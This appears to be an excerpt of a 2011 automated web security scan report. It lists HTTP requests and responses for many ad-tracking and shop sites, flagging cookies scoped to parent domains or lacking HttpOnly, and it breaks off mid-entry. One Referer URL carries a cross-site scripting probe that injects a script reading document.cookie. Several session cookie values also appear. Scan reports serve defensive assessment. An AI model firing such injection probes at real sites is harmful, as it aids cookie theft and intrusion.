function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;} i.src=u;p[p.length]=i;}} function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /track.fcgi?merchantid=3100817967&eventid=0&ifmode=1 HTTP/1.1 Host: adserver.veruta.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jstag HTTP/1.1 Host: bid.openx.net Proxy-Connection: keep-alive Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript; charset=iso-8859-1 Cache-Control: public, max-age=3600 P3P: CP="CUR ADM OUR NOR STA NID" Connection: close Expires: Sun, 15 May 2011 15:01:49 UTC Content-Length: 1454 Set-Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; version=1; path=/; domain=.openx.net; max-age=63072000;
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26E7E95E85011A11-400001092013EAAF[CE]; Expires=Fri, 13 May 2016 13:18:53 GMT; Domain=.gelifesciences.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /4/hp/us/en/commercial/presales.awareness/services/all/%7C/r61/%7Cus/en/services/it-services.html/1314572112@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15?id=r61&ms=commercial&sc=presales.awareness&co=services&sco=all&msmdavalue=-1&wsid=r61&ezbuyExperience=channel&ezbuyPNList=-1&ezbEppId=-1&ezbStoreId=-1&ezbPartnerList=-1&rhi=rhi-&qt=-1 HTTP/1.1 Host: h41174.www4.hp.com Proxy-Connection: keep-alive Referer: http://www8.hp.com/us/en/services/it-services.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:22 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW803P0iYACJOu; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.hp.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2066 Content-Type: application/x-javascript Set-Cookie: NSC_I41174-IQ_qppm_iuuq=ffffffff0909d79c45525d5f4f58455e445a4a423660;path=/;httponly
function OAS_RICH(position) { if (position == 'Frame1') { document.write ('<!-- -->'); } if (position == 'Frame2') { document.write ('<!-- -->'); } if (position == 'Left1') { document.write ('<!-- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rs?id=d30b1d9b051449f4b23bae33eb84e507&t=marketing HTTP/1.1 Host: i.w55c.net Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/chatcisp1/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465392691 HTTP/1.1 Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.cisp.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml" Content-Type: application/x-javascript Cache-Control: must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: vsid=G5ba54a33PuS;Path=/;Domain=.providesupport.com Content-Length: 3445 Date: Sun, 15 May 2011 13:16:33 GMT Connection: close
var ps_chatcisp1_sid = "G5ba54a33PuS"; // safe-monitor@gecko.js
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
//Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) var rsi_now= new Date(); var rsi_csid= 'H05525';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /w/tre?ad_id=19801;evt=1;cat1=1;cat2=12939 HTTP/1.1 Host: media.fastclick.net Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26E7E92585010141-6000010B401B0D64[CE]; Expires=Fri, 13 May 2016 13:16:59 GMT; Domain=.hp.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_jix60njix60=[CS]v4|0-0|4DCFD2E6[CE]; Expires=Fri, 13 May 2016 13:19:34 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/mngimng/1/H.17/s61455768113955?AQB=1&ndh=1&t=15/4/2011%208%3A17%3A16%200%20300&g=http%3A//www.medianewsgroup.com/Pages/default.aspx&cc=USD&ch=Home&events=event1&c1=D%3Dg&c29=www.medianewsgroup.com%20/%20SiteCatalystCode_H_17.js&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1020&bh=945&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: mngimng.112.2o7.net Proxy-Connection: keep-alive Referer: http://www.medianewsgroup.com/Pages/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 15 May 2011 13:19:34 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_jix60njix60=[CS]v4|0-0|4DCFD2E6[CE]; Expires=Fri, 13 May 2016 13:19:34 GMT; Domain=.2o7.net; Path=/ Location: http://mngimng.112.2o7.net/b/ss/mngimng/1/H.17/s61455768113955?AQB=1&pccr=true&&ndh=1&t=15/4/2011%208%3A17%3A16%200%20300&g=http%3A//www.medianewsgroup.com/Pages/default.aspx&cc=USD&ch=Home&events=event1&c1=D%3Dg&c29=www.medianewsgroup.com%20/%20SiteCatalystCode_H_17.js&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1020&bh=945&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.4.1 Expires: Sat, 14 May 2011 13:19:34 GMT Last-Modified: Mon, 16 May 2011 13:19:34 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www400 Content-Length: 0 Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/pdc?cat=&name=landing&sid=1888 HTTP/1.1 Host: pixel.fetchback.com Proxy-Connection: keep-alive Referer: http://www.new.onebox.com/home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /_1305465394383/rexdot.gif?l=30&id=0sfr2eMuwEBa_Z.w.aYwrJch.lzgKkcwiJl1SiBNseL.G7&fr=1&fv=Shockwave%20Flash%2010.3%20r181&tz=300&href=http%3A//www.turk.net/&ref=&screen=1920x1200&col=32 HTTP/1.1 Host: pro.hit.gemius.pl Proxy-Connection: keep-alive Referer: http://www.turk.net/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /r/beacon?b2=xsKlvalg4lwfy8LPcIiVCPKkpSxp_RJng-zvuwC70piejuJEq_LImxDsetEai8Le1n88qWVlF6FRdkauRZlBdQ HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=2305757;type=hpcom559;cat=hpcom619;ord=1;num=6354125628713.519? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /r1/pixel/x373 HTTP/1.1 Host: rs.gwallet.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel?pixelID=13450&partnerID=91&clientID=2648&key=segment&returnType=js HTTP/1.1 Host: segment-pixel.invitemedia.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=1888 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:30 GMT Set-Cookie: uid=7f79cc31-6414-41b9-8590-eaa56f2b9910;Expires=Mon, 14-May-2012 13:16:30 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: segments_p1="eJzjYuboygQAAdgBCQ==";Version=1;Path=/;Domain=invitemedia.com;Expires=Mon, 14-May-2012 13:16:30 GMT;Max-Age=31536000 Pragma: no-cache Content-Type: text/javascript P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Cache-Control: no-cache Content-Length: 343 Connection: close Server: Jetty(7.3.1.v20110307)
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26E7E975851595AD-400001752000449F[CE]; Expires=Fri, 13 May 2016 13:19:39 GMT; Domain=.vehix.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/189 HTTP/1.1 Host: tags.mediaforge.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/plain Date: Sun, 15 May 2011 13:16:50 GMT P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" PRAGMA: no-cache Server: nginx/0.8.53 Set-Cookie: uID=CqDfQk3P0kKbugOgCW2AAg==; expires=Mon, 14-May-12 13:16:50 GMT; domain=.mediaforge.com; path=/ Content-Length: 1442 Connection: keep-alive
_mf_tag = { "init": function() { var id = 'mf_div'; var div = this.create_element(document, ['div', 'id', id]); if(div) { div.style.displa ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tp?act=1&cid=559woa3610&tz=5&ref=&page=http%3A%2F%2Fwww.teleflora.com%2F&uuid=540B8811-AD16-418C-B36C-877EDE932F36&rnd=39396226 HTTP/1.1 Host: tracker.marinsm.com Proxy-Connection: keep-alive Referer: http://www.teleflora.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0 P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS" Pragma: no-cache Cache-Control: private, no-cache Content-Type: image/gif Content-Length: 35 Date: Sun, 15 May 2011 13:18:45 GMT Connection: close Set-Cookie: _msuuid=540B8811-AD16-418C-B36C-877EDE932F36; Domain=marinsm.com; Expires=Mon, 14-May-2012 13:18:45 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bigcommerce-vs-oscommerce.php?ga_campaign=(roi)+competitors&ga_adgroup=oscommerce&ga_keyword=osCommerce&gclid=CMjIyryO6qgCFc065Qod0hgzvA HTTP/1.1 Host: www.bigcommerce.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.eshopfitters.co.uk Proxy-Connection: keep-alive Referer: http://www.oscommerce.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.internetnatrgovina.com Proxy-Connection: keep-alive Referer: http://shops.oscommerce.com/directory/goto,43692 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.mmabasket.com Proxy-Connection: keep-alive Referer: http://shops.oscommerce.com/directory/goto,43678 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.sapiens.co.uk Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns="http://www.w3.org/1999/xhtml"> <!-- BC ...[SNIP]...
11. Cookie without HttpOnly flag set
There are 243 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
(new Image(0,0)).src='http://ad.doubleclick.net/activity;src=1897549;dcnet=4591;boom=18245;sz=1x1;ord='; (new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=562523&id=390905'; (new Imag ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=8usl3dbjfoecp35qrbtrppbt37; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?vid=139237823&eid=49&tid=null&tag=landing&ref=http%3A//www.teleflora.com/ HTTP/1.1 Host: cts-log.channelintelligence.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:18:48 GMT Server: Jetty(6.1.22) Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: serverstamp=4C33DB3C-A4E9-E1AE-6596-9AA13B00657D;Domain=.channelintelligence.com;Expires=Wed, 12-May-21 13:18:48 GMT Set-Cookie: sessionstamp=E5D27090-A511-99DB-5353-545157305174;Domain=.channelintelligence.com;Expires=Sun, 15-May-11 14:18:48 GMT Cache-Control: private,no-store Content-Length: 42 pragma: no-cache content-type: image/gif X-Powered-By: Mirror Image Internet P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" Via: 1.1 dfw061005 (MII-APC/1.6)
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=7ihan2igv8k9oo4954bucqks84; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /channels/freezone-partners?application=32 HTTP/1.1 Host: freezone.iinet.net.au Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:21:29 GMT Server: Apache-Coyote/1.1 Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1305465689510 Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=285F8FE1904E96B3C1F92BE24940B74D; Path=/ Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 33225
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>MyEmail - Logging in and out - Email - MyHelp</title>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /offers/23073174/start?plid=824141399 HTTP/1.1 Host: onebox.extole.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html><body>You are being <a href="http://onebox.extole.com/offers/23073174/share?extra_url_query_string=706c69643d383234313431333939">redirected</a>.</body></html>
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /visitor/index.php?/Default/LiveChat/HTML/HTMLButton/cHJvbXB0dHlwZT1jaGF0JnVuaXF1ZWlkPW8yMGg4Z2czcHgmdmVyc2lvbj00LjAxLjg1JnByb2R1Y3Q9RnVzaW9uJmZpbHRlcmRlcGFydG1lbnRpZD0yMSZyb3V0ZWNoYXRza2lsbGlkPTEsMiwzJmN1c3RvbW9ubGluZT0mY3VzdG9tb2ZmbGluZT0mY3VzdG9tYXdheT0mY3VzdG9tYmFja3Nob3J0bHk9CjVmMzE5MDk3ZGE2M2MyZDNlYzM3NmIwZWNlZjMxODc4YTc0MGQ2OTg= HTTP/1.1 Host: support.magneticone.com Proxy-Connection: keep-alive Referer: http://www.oscommerce-manager.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.active24.co.uk Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 15374 Content-Type: text/html Expires: Sun, 15 May 2011 13:15:21 GMT Set-Cookie: UserName=Anonymous; path=/ Set-Cookie: UserId=; path=/ Set-Cookie: ASPSESSIONIDCQBBQBDS=DELLPANDEAJADHIDHBDAOFDP; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <!-- left-nav --> <HEAD> <TITLE>Active 24 : Active 24</TITLE> <!-- Content Management System provided by Synkron A/S | www.sy ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.active24.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
